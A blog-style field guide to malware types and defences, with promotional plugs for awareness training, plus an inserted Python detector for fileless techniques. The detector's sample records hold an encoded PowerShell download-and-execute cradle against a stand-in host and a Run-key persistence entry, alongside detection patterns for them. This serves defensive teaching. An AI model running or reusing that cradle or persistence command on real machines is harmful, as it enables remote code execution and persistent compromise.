In 2022, the FBI's Internet Crime Complaint Center (IC3) received over 800,000 complaints with losses exceeding $10.3 billion — and malware was the engine behind a staggering number of those incidents. I've spent years watching organizations get blindsided not because they lacked firewalls, but because nobody on the team could tell a trojan from a rootkit. Understanding the types of malware isn't an academic exercise. It's the difference between catching an attack in the first five minutes and discovering it five months later during a forensic investigation.

This post is a field guide. I'm going to walk you through each major malware category, show you how threat actors actually deploy them, and point you to the defenses that work in practice — not just in theory.

Why Knowing the Types of Malware Still Matters in 2023

You might think malware classification is Security 101 — something you covered in a cert exam and moved on from. But here's what I've seen over and over: incident response teams misidentify the malware family during triage, which leads to the wrong containment strategy, which leads to reinfection within days.

The Verizon 2022 Data Breach Investigations Report found that 40% of breaches involved malware of some kind, with ransomware alone appearing in 25% of all breaches — a jump from prior years. Each type of malware behaves differently, spreads differently, and demands a different response. If your security awareness training doesn't cover this in practical terms, your people are flying blind.

That's exactly why we built our cybersecurity awareness training course — to give employees and IT teams the real-world knowledge they need to recognize and respond to threats before damage is done.

Viruses: The Original Threat That Never Left

Computer viruses are self-replicating code that attaches to legitimate programs or files. They need a host — a document, an executable, a macro — and they need human action to spread. You open the file, the virus activates.

Viruses aren't the headline-grabbers they were in the early 2000s, but they haven't disappeared. I still see them embedded in pirated software downloads and weaponized Office documents. The key characteristic: they can't spread without you doing something first.

How Viruses Typically Arrive

  • Email attachments with malicious macros
  • Infected USB drives (still a real vector — ask the Department of Defense)
  • Trojanized software downloaded from unofficial sources

Worms: Self-Spreading and Self-Sufficient

Unlike viruses, worms don't need a host file or human interaction to propagate. They exploit vulnerabilities in networks and operating systems to spread autonomously. WannaCry in 2017 remains the textbook example — it leveraged the EternalBlue exploit in Windows SMB to tear through networks in over 150 countries, hitting the UK's National Health Service especially hard.

Worms are terrifying because of their speed. One vulnerable endpoint on your network is all it takes. This is why CISA's Known Exploited Vulnerabilities Catalog exists — patching the vulnerabilities worms exploit is your single best defense.

Ransomware: The $4.88M Problem

Ransomware encrypts your files and demands payment for the decryption key. That's the simple version. The reality in 2023 is far uglier.

Modern ransomware gangs like LockBit, BlackCat (ALPHV), and Royal don't just encrypt — they exfiltrate data first and threaten to publish it. This double extortion model means even organizations with solid backups face massive pressure to pay. The FBI's IC3 received 2,385 ransomware complaints in 2022 with adjusted losses over $34.3 million — and that's just what was reported. The real number is multiples higher.

The Ransomware Kill Chain

In my experience, ransomware almost never arrives as the first payload. The typical attack chain looks like this:

  • Initial access: Phishing email with a malicious link or attachment
  • Foothold: Commodity malware like Emotet or QakBot drops onto the endpoint
  • Lateral movement: The threat actor uses credential theft tools like Mimikatz to move across the network
  • Exfiltration: Sensitive data is copied to attacker-controlled infrastructure
  • Detonation: Ransomware is deployed network-wide, often on a Friday night or holiday

Breaking any link in that chain stops the attack. That's why phishing simulation and security awareness training are so critical — they target the initial access point. Our phishing awareness training for organizations is designed to drill exactly these scenarios with your teams.

Trojans: The Malware That Wears a Disguise

Trojans masquerade as legitimate software. The user thinks they're installing a PDF reader, a game crack, or a browser update. Instead, they're handing a threat actor a foothold on their machine.

Trojans are one of the most common types of malware I encounter in incident response. Emotet started life as a banking trojan before evolving into a full malware distribution platform. TrickBot followed a similar path. These aren't simple programs — they're modular frameworks that download additional payloads, steal credentials, and open backdoors for ransomware operators.

Remote Access Trojans (RATs)

RATs are a subset that deserves special attention. They give attackers full remote control of an infected system — access to the webcam, the keyboard, the file system, everything. They're favored by both cybercriminals and nation-state actors. If you've ever wondered how corporate espionage actually works in practice, RATs are often the answer.

Spyware and Keyloggers: Silent Data Thieves

Spyware monitors user activity and sends data back to the attacker. Keyloggers — a specific type of spyware — record every keystroke. Passwords, credit card numbers, private messages, internal memos — all captured in real time.

These tools are often bundled with other malware or installed through social engineering. I've investigated cases where a single keylogger on a finance department workstation led to wire fraud losses exceeding $200,000. The keylogger had been active for three months before anyone noticed.

Multi-factor authentication is your best countermeasure here. Even if an attacker captures a password via keylogger, MFA adds a barrier they can't easily bypass — especially hardware-based tokens or authenticator apps.

Rootkits: The Malware You Can't See

Rootkits operate at the deepest levels of the operating system — sometimes at the kernel level, sometimes in the firmware. Their entire purpose is to hide other malware from detection. Antivirus won't catch them. Standard monitoring won't flag them.

Rootkits are relatively rare compared to ransomware or trojans, but when they appear, the damage is severe and remediation is brutal. In many cases, I recommend full hardware replacement rather than trying to clean a firmware-level rootkit. You simply can't trust the machine anymore.

How Rootkits Relate to Zero Trust

This is one reason the zero trust security model has gained so much traction. If you assume every device could be compromised — including by something invisible like a rootkit — you design your network so that no single compromised device gives an attacker the keys to the kingdom. Verify everything. Trust nothing implicitly.

Adware and Potentially Unwanted Programs (PUPs)

Adware generates revenue for its creator by displaying unwanted advertisements. It's annoying, but the security risk is real — adware often redirects browsers to malicious sites or bundles itself with spyware.

I don't spend a lot of time worrying about adware in enterprise environments because endpoint detection tools handle it well. But in small businesses and home offices? It's everywhere. And it's often the gateway to more serious infections.

Fileless Malware: Living Off the Land

Fileless malware doesn't write traditional files to disk. Instead, it abuses legitimate system tools — PowerShell, WMI, the Windows Registry — to execute malicious actions entirely in memory. This makes it extremely difficult for traditional antivirus to detect.

The National Institute of Standards and Technology (NIST) has emphasized the need for behavioral detection capabilities specifically because fileless techniques bypass signature-based tools. If your security stack relies solely on scanning files, you're missing an entire category of attacks.

Common Fileless Techniques

  • PowerShell abuse: Downloading and executing payloads directly in memory
  • Registry persistence: Storing malicious scripts in registry keys that execute at startup
  • DLL injection: Loading malicious code into running processes
  • Macro-based attacks: Office macros that invoke system tools without dropping files
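As an added example (not from the post), here is a small Python detector that applies the behavioral approach the post recommends to two of the techniques above, run over constructed sample records: it decodes a PowerShell -EncodedCommand payload to look for an in-memory download cradle, and flags Run-key persistence whose value launches a script interpreter. The key=value log format, hostnames, paths and values are constructed for this example and do not mirror any specific product's telemetry.

```python
import base64
import re

# Constructed sample records (not from the post) in a simplified key=value format
# assumed for this example; real EDR or Sysmon telemetry is shaped differently.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode()  # PowerShell uses UTF-16LE
SAMPLE_LOGS = [
    'event=process_create image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c dir"',
    'event=process_create image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'cmdline="powershell.exe -NoP -W Hidden -EncodedCommand {_ENCODED}"',
    'event=registry_set key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
    f'value=Updater data="powershell.exe -w hidden -enc {_ENCODED}"',
    'event=registry_set key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
    'value=OneDrive data="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"',
]

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
_INMEM = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String", re.I)
_RUNKEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
_INTERP = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b", re.I)

def parse(line):
    """Split one key=value record into a dict, stripping quotes around values."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}

def decode_encoded_command(cmdline):
    """Decode a -e/-enc/-EncodedCommand payload (base64 over UTF-16LE), else None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def detect(lines):
    """Return (line_no, rule, detail) for two fileless patterns from the post: in-memory
    download/execute via PowerShell, and Run-key persistence that launches an interpreter."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse(line)
        if ev.get("event") == "process_create" and "powershell" in ev.get("image", "").lower():
            decoded = decode_encoded_command(ev.get("cmdline", ""))  # plain matching sees only base64
            if decoded and _INMEM.search(decoded):
                findings.append((n, "powershell_in_memory_download", decoded))
        elif ev.get("event") == "registry_set" and _RUNKEY.search(ev.get("key", "")) \
                and _INTERP.search(ev.get("data", "")):
            findings.append((n, "runkey_interpreter_persistence", ev["data"]))
    return findings
```

The benign cmd.exe and OneDrive records produce no findings, which is the point: the rules key on behavior (decoded content and what a Run key launches), not on file signatures.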

What Type of Malware Is Most Common?

Based on the FBI IC3 2022 Internet Crime Report and industry data, ransomware and phishing-delivered trojans dominate the current threat landscape. Ransomware gets the headlines because of the financial impact. But commodity trojans like QakBot and Emotet (before its January 2021 takedown and subsequent resurgence) are the delivery vehicles that make ransomware attacks possible.

Social engineering — particularly phishing — remains the primary initial access vector for nearly every type of malware. That's not a technology problem. It's a people problem. And it requires a people-focused solution.

Defending Against Every Type of Malware: What Actually Works

I'm not going to give you a generic checklist. Here's what I've seen actually reduce malware incidents in organizations I've worked with:

1. Patch Ruthlessly and Quickly

Worms and exploit-based malware depend on known vulnerabilities. CISA's Known Exploited Vulnerabilities Catalog tells you exactly what to prioritize. If you're not patching critical vulnerabilities within 48 hours of disclosure, you're accepting unnecessary risk.

2. Deploy Endpoint Detection and Response (EDR)

Traditional antivirus is insufficient against fileless malware, rootkits, and modern trojans. EDR tools monitor behavior — not just file signatures — and can catch attacks that legacy tools miss entirely.

3. Enforce Multi-Factor Authentication Everywhere

Credential theft is a component of almost every serious malware campaign. MFA doesn't make you invincible, but it eliminates the easiest path attackers have into your systems.

4. Train Your People — Continuously

Phishing simulation isn't a one-and-done exercise. Threat actors change tactics constantly. Your training has to keep pace. Enroll your team in ongoing cybersecurity awareness training and run regular phishing simulations that mirror current attack campaigns.

5. Implement Network Segmentation

If ransomware or a worm gets into one subnet, segmentation prevents it from reaching your crown jewels. This is zero trust in practice — limit blast radius by design.

6. Maintain and Test Backups

Backups are your last line of defense against ransomware. But untested backups are worthless. I've seen organizations discover during a ransomware incident that their backup tapes were corrupted — or worse, also encrypted because the backup system was on the same network.

The Threat Landscape Is Evolving — Your Defenses Should Too

Every category of malware I've described here is actively being used by threat actors right now, in April 2023. Some are decades old. Some barely existed five years ago. The attackers don't care about categories — they chain multiple types of malware together in a single campaign to achieve their objectives.

Your job is to make every link in that chain as hard to exploit as possible. That starts with understanding what you're up against. It continues with building layered defenses — technical controls, security awareness, and incident response capabilities working together.

The organizations that get breached aren't always the ones with the weakest technology. They're the ones where nobody recognized the phishing email, nobody questioned the suspicious download, and nobody knew what a trojan looked like until it was too late.

Don't let that be your organization.